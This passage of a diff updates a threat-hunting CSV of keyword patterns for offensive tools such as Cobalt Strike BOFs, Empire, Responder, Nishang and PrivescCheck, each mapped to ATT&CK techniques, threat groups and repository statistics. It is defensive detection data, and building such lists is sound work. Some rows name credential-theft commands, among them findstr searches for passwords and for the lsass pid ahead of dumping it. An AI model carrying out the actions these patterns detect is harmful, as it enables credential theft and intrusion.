- T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*FindProcHandle *lsass*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - 
T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/FindObjects-BOF","1","0","N/A","10","10","263","50","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z" -"*Find-ProtectionSoftware*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Find-PSScriptsInPSAppLog*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-ProtectionSoftware*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Find-PSScriptsInPSAppLog*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Find-PSServiceAccounts.ps1*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" -"*Find-RDPClientConnections*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*FindSMB2UPTime.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*Find-RDPClientConnections*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-ComputerDetails.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*FindSMB2UPTime.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*Findsploit*","offensive_tool_keyword","Findsploit","Finsploit is a simple bash script to quickly and easily search both local and online exploit databases. This repository also includes copysploit to copy any exploit-db exploit to the current directory and compilesploit to automatically compile and run any C exploit (ie. 
./copysploit 1337.c && ./compilesploit 1337.c)","T1210 - T1105 - T1218","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/1N3/Findsploit","1","1","N/A","N/A","10","1493","334","2021-09-27T01:43:24Z","2015-03-16T16:15:55Z" "*findstr *BEGIN CERTIFICATE*","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*findstr *confidential*","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*findstr *net use*","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*findstr *password*","offensive_tool_keyword","findstr","findstr used to find credentials","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*findstr lsass*","offensive_tool_keyword","findstr","findstr used to find lsass pid in order to dump lsass process","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*findstr lsass*","offensive_tool_keyword","findstr","findstr used to find lsass pid in order to dump lsass process","T1003 - T1057 - T1070 - T1082 - T1552","TA0001 - TA0002 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential 
Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*findstr.exe Tvndrgaaa*","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Findsubdomains*","offensive_tool_keyword","findsubdomains","A subdomains discovery tool that collects all possible subdomains from open source internet and validates them through various tools to provide accurate results.","T1590 - T1591 - T1595 - T1596 - T1599","TA0011","N/A","N/A","Information Gathering","https://findsubdomains.com/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Find-TrustedDocuments*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Find-TrustedDocuments.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Find-TrustedDocuments.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1076","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*FindUncommonShares.git*","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","1","N/A","N/A","4","331","38","2023-10-03T21:49:54Z","2021-10-06T12:30:16Z" +"*Find-TrustedDocuments*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Find-TrustedDocuments.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Find-TrustedDocuments.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1076","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*FindUncommonShares.git*","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","1","N/A","N/A","4","332","38","2023-10-04T03:52:10Z","2021-10-06T12:30:16Z" "*FindUncommonShares.p*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
-"*FindUncommonShares.py *","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","0","N/A","N/A","4","331","38","2023-10-03T21:49:54Z","2021-10-06T12:30:16Z"
-"*FindUncommonShares-main*","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","1","N/A","N/A","4","331","38","2023-10-03T21:49:54Z","2021-10-06T12:30:16Z"
-"*finduncshar_scan*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*FindUncommonShares.py *","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","0","N/A","N/A","4","332","38","2023-10-04T03:52:10Z","2021-10-06T12:30:16Z"
+"*FindUncommonShares-main*","offensive_tool_keyword","FindUncommonShares","FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows 
Domains","T1135","TA0007","N/A","N/A","Discovery","https://github.com/p0dalirius/FindUncommonShares","1","1","N/A","N/A","4","332","38","2023-10-04T03:52:10Z","2021-10-06T12:30:16Z"
+"*finduncshar_scan*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
 "*Find-UnsafeLogonScriptPermissions.ps1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z"
 "*Find-UnsafeUNCPermissions -UNCScripts*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z"
 "*Find-UnsafeUNCPermissions.ps1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","1","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z"
-"*Find-UserField -SearchField *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Find-WMILocalAdminAccess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*FireBuster.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*fireeye*commando*","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6323","1248","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*Find-UserField -SearchField *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
